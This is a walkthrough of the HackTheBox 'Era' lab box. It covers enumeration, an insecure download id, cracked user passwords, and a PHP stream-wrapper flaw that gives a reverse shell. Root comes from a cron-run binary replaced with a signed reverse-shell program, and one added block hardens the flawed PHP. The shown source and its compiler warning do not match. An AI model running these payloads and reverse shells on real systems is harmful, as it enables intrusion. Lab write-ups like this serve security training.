HackTheBox-Era



Information Gathering

 ./rustscan -a 10.10.11.79
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
0day was here ♥

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.11.79:21
Open 10.10.11.79:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-17 01:04 EST
Initiating Ping Scan at 01:04
Scanning 10.10.11.79 [4 ports]
Completed Ping Scan at 01:04, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:04
Completed Parallel DNS resolution of 1 host. at 01:04, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 01:04
Scanning 10.10.11.79 [2 ports]
Discovered open port 80/tcp on 10.10.11.79
Discovered open port 21/tcp on 10.10.11.79
Completed SYN Stealth Scan at 01:04, 0.20s elapsed (2 total ports)
Nmap scan report for 10.10.11.79
Host is up, received echo-reply ttl 63 (0.097s latency).
Scanned at 2025-11-17 01:04:41 EST for 0s

PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 63
80/tcp open http syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.44 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
ftp 10.10.11.79
Connected to 10.10.11.79.
220 (vsFTPd 3.0.5)
Name (10.10.11.79:kali): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp>
ftp> exit
221 Goodbye.

FTP does not allow anonymous login, so look at the web interface.

It is reasonable to suspect that one of the names shown there is a valid username, so first write those names into a wordlist for later.

Virtual host brute forcing gives a result.

 gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://era.htb/ -t 30 --append-domain
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://era.htb/
[+] Method: GET
[+] Threads: 30
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: file.era.htb Status: 200 [Size: 6765]
Progress: 114441 / 114442 (100.00%)
===============================================================
Finished
===============================================================

All four options prompt for a login, but the names from above paired with common weak passwords give nothing.

FTP was also brute-forced, with no result.

Try brute-forcing directories.

# dirsearch -u http://file.era.htb
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/reports/http_file.era.htb/_25-11-17_01-36-25.txt

Target: http://file.era.htb/

[01:36:25] Starting:
[01:36:30] 403 - 564B - /.ht_wsr.txt
[01:36:30] 403 - 564B - /.htaccess.sample
[01:36:30] 403 - 564B - /.htaccess.orig
[01:36:30] 403 - 564B - /.htaccess.bak1
[01:36:30] 403 - 564B - /.htaccess.save
[01:36:30] 403 - 564B - /.htaccess_extra
[01:36:30] 403 - 564B - /.htaccess_orig
[01:36:30] 403 - 564B - /.htaccess_sc
[01:36:30] 403 - 564B - /.htaccessBAK
[01:36:30] 403 - 564B - /.htaccessOLD
[01:36:30] 403 - 564B - /.htaccessOLD2
[01:36:30] 403 - 564B - /.htm
[01:36:30] 403 - 564B - /.html
[01:36:30] 403 - 564B - /.httr-oauth
[01:36:30] 403 - 564B - /.htpasswds
[01:36:30] 403 - 564B - /.htpasswd_test
[01:36:49] 301 - 178B - /assets -> http://file.era.htb/assets/
[01:36:49] 403 - 564B - /assets/
[01:36:58] 302 - 0B - /download.php -> login.php
[01:37:01] 301 - 178B - /files -> http://file.era.htb/files/
[01:37:01] 403 - 564B - /files/
[01:37:01] 403 - 564B - /files/cache/
[01:37:01] 403 - 564B - /files/tmp/
[01:37:04] 403 - 564B - /images/
[01:37:04] 301 - 178B - /images -> http://file.era.htb/images/
[01:37:08] 200 - 34KB - /LICENSE
[01:37:09] 200 - 9KB - /login.php
[01:37:09] 200 - 70B - /logout.php
[01:37:10] 302 - 0B - /manage.php -> login.php
[01:37:20] 200 - 3KB - /register.php
[01:37:31] 302 - 0B - /upload.php -> login.php

The scan turns up a registration page; after registering an account and logging in, it looks like files can be uploaded.

After uploading a file, a download link is returned.

http://file.era.htb/download.php?id=7817

Note the id parameter.

There may be other files available for download, so fuzz it.

ffuf -u "http://file.era.htb/download.php?id=FUZZ" -w id.txt -H 'Cookie:PHPSESSID=jufdhn16ovg3aop3qtp2jevmgg' -fw 3161

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://file.era.htb/download.php?id=FUZZ
:: Wordlist : FUZZ: /home/kali/Desktop/id.txt
:: Header : Cookie: PHPSESSID=jufdhn16ovg3aop3qtp2jevmgg
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 3161
________________________________________________

54 [Status: 200, Size: 6378, Words: 2552, Lines: 222, Duration: 141ms]
150 [Status: 200, Size: 6366, Words: 2552, Lines: 222, Duration: 93ms]
:: Progress: [1000/1000] :: Job [1/1] :: 441 req/sec :: Duration: [0:00:03] :: Errors: 0 ::

Visiting id 54 turns up what looks like the site's source code.

Downloading it reveals a database file inside, which contains password hashes.

Two users' passwords were cracked successfully.

john hash.txt --wordlist=rockyou.txt    
Using default input encoding: UTF-8
Loaded 6 password hashes with 6 different salts (bcrypt [Blowfish 32/64 X3])
Loaded hashes with cost 1 (iteration count) varying from 1024 to 4096
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
america (eric)
mustang (yuri)
2g 0:00:01:55 0.03% (ETA: 2025-11-21 08:41) 0.01735g/s 47.17p/s 193.6c/s 193.6C/s marias..ilovejack
Use the "--show" option to display all of the cracked passwords reliably
Session aborted

But after logging in with them there are no files to modify, so try to log in as the administrator.

What is very odd here is that, while logged in as user A, you can change user B's security questions (a broken access-control flaw); this is used to change the administrator's security questions.

Logged in successfully as the administrator.

Downloading the "sign" file at the bottom reveals an email address; it is not clear what it is for.

GetEric


There was no good way forward from here, so going back to the FTP service: yuri can log in with the credentials from the database.

ftp 10.10.11.79 
Connected to 10.10.11.79.
220 (vsFTPd 3.0.5)
Name (10.10.11.79:kali): yuri
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||62972|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Jul 22 08:42 apache2_conf
drwxr-xr-x 3 0 0 4096 Jul 22 08:42 php8.1_conf

Going into the php8.1 directory, the ssh2 extension turns out to be enabled.

ssh2:// — Secure Shell 2

Description
ssh2.shell:// ssh2.exec:// ssh2.tunnel:// ssh2.sftp:// ssh2.scp:// (PECL)

Note: this wrapper is not enabled by default.
To use the ssh2.*:// wrappers, a working SSH2 extension from PECL must be installed.

Besides the traditional URI login details, the ssh2 wrappers also support reusing an already open connection via the host part of the URL.

Usage
ssh2.shell://user:pass@example.com:22/xterm
ssh2.exec://user:pass@example.com:22/usr/local/bin/somecmd
ssh2.tunnel://user:pass@example.com:22/192.168.0.1:14
ssh2.sftp://user:pass@example.com:22/path/to/filename

Meanwhile, auditing the download.php obtained earlier shows that when the user is the administrator, the argument passed to fopen can be controlled.

// BETA (Currently only available to the admin) - Showcase file instead of downloading it
} elseif ($_GET['show'] === "true" && $_SESSION['erauser'] === 1) {
    $format = isset($_GET['format']) ? $_GET['format'] : '';
    $file = $fetched[0];

    // user-controlled $format becomes the stream-wrapper prefix passed to fopen()
    if (strpos($format, '://') !== false) {
        $wrapper = $format;
        header('Content-Type: application/octet-stream');
    } else {
        $wrapper = '';
        header('Content-Type: text/html');
    }

    try {
        $file_content = fopen($wrapper ? $wrapper . $file : $file, 'r');
        $full_path = $wrapper ? $wrapper . $file : $file;
        // Debug Output
        echo "Opening: " . $full_path . "\n";
        echo $file_content;
    } catch (Exception $e) {
        echo "Error reading file: " . $e->getMessage();
    }

Construct the payload.

http://file.era.htb/download.php?id=150&show=true&format=ssh2.exec://eric:america@127.0.0.1:22/bash+-i+%3E%26+/dev/tcp/10.10.16.20/4444+0%3E%261;
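As an added example (not code from the box or from the original post), here is a hardened rewrite of the admin-only "show" branch: the format parameter only selects a Content-Type from an allow-list and never becomes part of the path, and the file is canonicalised and confined to an assumed UPLOAD_DIR before it is opened. $fetched[0] and $_SESSION['erauser'] are assumed to carry the same meaning as in the original snippet.

```php
<?php
// Hardened "show" branch (added example). The original let $_GET['format']
// become an arbitrary stream-wrapper prefix for fopen(); here it never
// touches the path at all. UPLOAD_DIR is an assumed location.
const UPLOAD_DIR = '/var/www/file.era.htb/files';

// Returns the canonical path of $name inside UPLOAD_DIR, or null if it
// escapes the directory (".." segments, symlinks, wrapper-style names).
function resolve_upload_path(string $name): ?string
{
    $base = realpath(UPLOAD_DIR);
    $real = realpath(UPLOAD_DIR . '/' . basename($name));
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

function showcase_file(array $fetched, string $format): void
{
    // Allow-list, not "does it contain ://". Uploads are never served as
    // text/html, since that would turn any uploaded file into stored XSS.
    $modes = [
        'text'   => 'text/plain; charset=utf-8',
        'binary' => 'application/octet-stream',
    ];
    if (!isset($modes[$format])) {
        http_response_code(400);
        echo 'Unsupported format';
        return;
    }
    $path = resolve_upload_path((string) $fetched[0]);
    if ($path === null) {
        http_response_code(404);
        echo 'File not found';
        return;
    }
    header('Content-Type: ' . $modes[$format]);
    header('X-Content-Type-Options: nosniff');
    // The original echoed the fopen() handle ("Resource id #n") and the
    // resolved path; stream the bytes and keep the path server-side.
    readfile($path);
}

if (($_GET['show'] ?? '') === 'true' && ($_SESSION['erauser'] ?? null) === 1) {
    showcase_file($fetched, $_GET['format'] ?? 'text');
}
```

With this shape, a request carrying format=ssh2.exec://... is answered with 400 before any file or wrapper is touched, which is also the line worth alerting on in the web server logs.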

Root


Upload pspy64 to watch processes.

2025/11/17 06:51:44 CMD: UID=1000  PID=12568  | /bin/bash -i 
2025/11/17 06:52:01 CMD: UID=0 PID=12572 | /usr/sbin/CRON -f -P
2025/11/17 06:52:01 CMD: UID=0 PID=12573 | /usr/sbin/CRON -f -P
2025/11/17 06:52:01 CMD: UID=0 PID=12574 | bash -c /root/initiate_monitoring.sh
2025/11/17 06:52:01 CMD: UID=??? PID=12575 | ???
2025/11/17 06:52:01 CMD: UID=0 PID=12576 | /bin/bash /root/initiate_monitoring.sh
2025/11/17 06:52:01 CMD: UID=0 PID=12577 | openssl asn1parse -inform DER -in text_sig_section.bin
2025/11/17 06:52:01 CMD: UID=0 PID=12580 | /bin/bash /root/initiate_monitoring.sh
2025/11/17 06:52:01 CMD: UID=0 PID=12578 | /bin/bash /root/initiate_monitoring.sh
2025/11/17 06:52:01 CMD: UID=0 PID=12583 |
2025/11/17 06:52:01 CMD: UID=0 PID=12581 | /bin/bash /root/initiate_monitoring.sh
2025/11/17 06:52:01 CMD: UID=0 PID=12584 | /bin/bash /root/initiate_monitoring.sh
2025/11/17 06:52:04 CMD: UID=0 PID=12585 |
2025/11/17 06:52:16 CMD: UID=1000 PID=12586 | cat user.txt
2025/11/17 06:52:38 CMD: UID=1000 PID=12589 | /bin/bash -i
2025/11/17 06:52:47 CMD: UID=1000 PID=12591 | ls --color=auto -la
2025/11/17 06:52:57 CMD: UID=1000 PID=12594 | /bin/bash -i
2025/11/17 06:53:01 CMD: UID=0 PID=12603 | /usr/sbin/CRON -f -P
2025/11/17 06:53:01 CMD: UID=0 PID=12604 | /bin/sh -c bash -c '/root/initiate_monitoring.sh' >> /opt/AV/periodic-checks/status.log 2>&1
2025/11/17 06:53:01 CMD: UID=0 PID=12605 |
2025/11/17 06:53:01 CMD: UID=0 PID=12606 | /bin/bash /root/initiate_monitoring.sh
2025/11/17 06:53:01 CMD: UID=0 PID=12608 | /bin/bash /root/initiate_monitoring.sh
2025/11/17 06:53:01 CMD: UID=0 PID=12607 | /bin/bash /root/initiate_monitoring.sh
2025/11/17 06:53:01 CMD: UID=0 PID=12610 | /bin/bash /root/initiate_monitoring.sh
2025/11/17 06:53:01 CMD: UID=0 PID=12609 | /bin/bash /root/initiate_monitoring.sh
2025/11/17 06:53:01 CMD: UID=0 PID=12611 | grep -oP (?<=UTF8STRING :)Era Inc.
2025/11/17 06:53:01 CMD: UID=0 PID=12614 | /bin/bash /root/initiate_monitoring.sh
2025/11/17 06:53:01 CMD: UID=0 PID=12612 | /bin/bash /root/initiate_monitoring.sh
2025/11/17 06:53:01 CMD: UID=0 PID=12615 | /bin/bash /root/initiate_monitoring.sh

Note that root runs the initiate_monitoring.sh job very frequently (once a minute from cron, as the timestamps show).

After uploading linpeas, there is a file we can write to.

eric@era:/opt/AV/periodic-checks$ ls -al
total 32
drwxrwxr-- 2 root devs 4096 Nov 17 06:56 .
drwxrwxr-- 3 root devs 4096 Jul 22 08:42 ..
-rwxrw---- 1 root devs 16544 Nov 17 06:56 monitor
-rw-rw---- 1 root devs 307 Nov 17 06:56 status.log
eric@era:/opt/AV/periodic-checks$ id
uid=1000(eric) gid=1000(eric) groups=1000(eric),1001(devs)
eric@era:/opt/AV/periodic-checks$

Combined with the process list from earlier, we know this binary is executed periodically, so all that is needed is to write a replacement for it.

 cat pwn.c 
#include <stdlib.h>  /* declares system(); without it gcc warns about an implicit declaration */

int main() {
    system("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.20/9999 0>&1'");
    return 0;
}

(Remember to copy the signature section from monitor here, because it is checked; uploading the replacement directly does not work.)

eric@era:/opt/AV/periodic-checks$ wget 10.10.16.20/pwn.c
--2025-11-17 06:59:57-- http://10.10.16.20/pwn.c
Connecting to 10.10.16.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 101 [text/x-csrc]
Saving to: ‘pwn.c’

pwn.c 100%[============================================================================>] 101 --.-KB/s in 0s

2025-11-17 06:59:57 (12.9 MB/s) - ‘pwn.c’ saved [101/101]

eric@era:/opt/AV/periodic-checks$ gcc pwn.c -o pwn
pwn.c: In function ‘main’:
pwn.c:2:5: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
2 | system("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.20/9999 0>&1'");
eric@era:/opt/AV/periodic-checks$ objcopy --dump-section .text_sig=text_sig /opt/AV/periodic-checks/monitor
objcopy: unable to copy file '/opt/AV/periodic-checks/monitor'; reason: Text file busy
eric@era:/opt/AV/periodic-checks$ objcopy --dump-section .text_sig=text_sig /opt/AV/periodic-checks/monitor
eric@era:/opt/AV/periodic-checks$ objcopy --add-section .text_sig=text_sig pwn
eric@era:/opt/AV/periodic-checks$ cp pwn monitor


http://example.com/2025/11/17/HackTheBox-Era/
Author: Skyarrow
Posted on: November 17, 2025